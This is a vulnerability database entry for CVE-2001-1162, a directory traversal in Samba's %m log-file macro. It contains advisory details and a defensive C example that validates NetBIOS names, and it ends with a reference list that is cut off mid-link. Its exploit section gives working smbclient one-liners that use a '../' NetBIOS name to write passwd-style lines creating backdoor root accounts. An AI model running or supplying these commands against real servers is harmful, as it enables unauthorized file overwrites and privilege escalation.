Samba smb.conf Configuration File %m Macro Directory Traversal Vulnerability

Vulnerability ID: 1106409
Vulnerability type: Path traversal
Published: 2001-06-23
Updated: 2005-05-02
CVE ID: CVE-2001-1162
CNNVD-ID: CNNVD-200106-117
Platform: Unix
CVSS score: 10.0
|Source
https://www.exploit-db.com/exploits/20968
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200106-117
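|Vulnerability details
A directory traversal vulnerability exists in the %m macro of the smb.conf configuration file in Samba versions before 2.2.0a. A remote attacker can overwrite certain files via a .. in the NetBIOS name, which is used in the name of a .log file.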
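An added example, not Samba's code and not part of the original advisory: one defensive way to validate the client-supplied NetBIOS name before it is substituted for %m in a log file path. The allow-list policy, the function names and the sample template are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define NETBIOS_NAME_MAX 15 /* usable characters in a NetBIOS name */

/* Allow-list check (assumed policy): letters, digits, '-' and '_' only,
 * so '.', '/' and '\\' can never reach the file name. */
int netbios_name_is_safe(const char *name)
{
    size_t len = strlen(name);
    if (len == 0 || len > NETBIOS_NAME_MAX)
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '-' && c != '_')
            return 0;
    }
    return 1;
}

/* Expand each %m in tmpl with the client name. Returns 0 on success,
 * -1 if the name is rejected or the result would not fit in out. */
int expand_log_path(const char *tmpl, const char *name, char *out, size_t outlen)
{
    size_t used = 0, nlen = strlen(name);
    if (outlen == 0 || !netbios_name_is_safe(name))
        return -1;
    while (*tmpl) {
        int is_macro = (tmpl[0] == '%' && tmpl[1] == 'm');
        size_t need = is_macro ? nlen : 1;
        if (used + need >= outlen) /* keep room for the terminating NUL */
            return -1;
        memcpy(out + used, is_macro ? name : tmpl, need);
        used += need;
        tmpl += is_macro ? 2 : 1;
    }
    out[used] = '\0';
    return 0;
}

int main(void)
{
    /* Constructed inputs; the second name is the -n value shown on this page. */
    const char *names[] = { "WKSTN01", "../../../tmp/x" };
    char path[128];
    for (int i = 0; i < 2; i++) {
        int rc = expand_log_path("/var/log/samba/log.%m", names[i], path, sizeof path);
        printf("%-16s -> %s\n", names[i], rc == 0 ? path : "rejected");
    }
    return 0;
}
```

Rejecting the name outright, rather than stripping characters from it, keeps two different clients from being mapped onto the same log file.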
|Exploit
source: http://www.securityfocus.com/bid/2928/info

Samba is a freely available file and printer sharing application maintained and developed by the Samba Development Team. Samba allows file and printer sharing between operating systems on the Unix and Microsoft platforms.

A remote user can write arbitrary files on the Samba server because the smb daemon does not sufficiently check NetBIOS name input. It is possible to overwrite files on the Samba server and, if the user also has local access, potentially gain elevated privileges.

This problem makes it possible for a remote user to deny service to legitimate users, and for a local user to potentially gain elevated privileges.

smbclient //NIMUE/"`perl -e '{print "ntoor::0:0::/:/bin/shn"}'`" -n ../../../tmp/x -N

From zhhsun <[email protected]>

smbclient //NIMUE/"`perl -e '{print "nopendoor::511:511::/:/bin/shn"}'`" -n ../../../tmp/x -N -I 192.168.12.13

and also

smbclient //NIMUE/"`perl -e '{print "ntoor::0:0::/:/bin/shn"}'`" -n ../../../tmp/x -N -I 192.168.12.13

Yugo Yugos <[email protected]> provided an exploit script. It is available at http://www.securityfocus.com/data/vulnerabilities/exploits/samba-exp.sh
|References

Source: XF
Name: samba-netbios-file-creation(6731)
Link: http://xforce.iss.net/static/6731.php
Source: BID
Name: 2928
Link: http://www.securityfocus.com/bid/2928
Source: BUGTRAQ
Name: 20010623 smbd remote file creation vulnerability
Link: http://www.securityfocus.com/archive/1/193027
Source: us1.samba.org
Link: http://us1.samba.org/samba/whatsnew/macroexploit.html
Source: HP
Name: HPSBUX0107-157
Link: http://www.securityfocus.com/advisories/3423
Source: REDHAT
Name: RHSA-2001:086
Link: http://www.redhat.com/support/errata/RHSA-2001-086.html
Source: MANDRAKE
Name: MDKSA-2001-062
Link: http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-062.php3
Source: DEBIAN
Name: DSA-065
Link: http://www.debian.org/security/2001/dsa-065
Source: CALDERA
Name: CSSA-2001-024.0
Link: http://www.calderasystems.com/support/security/advisories/CSSA-2001-024.0.txt
Source: IMMUNIX
Name: IMNX-2001-70-027-01
Link: http://download.immunix.org/ImmunixOS/7.0/updates/IMNX-2001-70-027-01
Source: CONECTIVA
Name: CLA-2001:405
Link: http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000405
Source: CIAC
Name: L-105
Link: http://ciac.llnl.
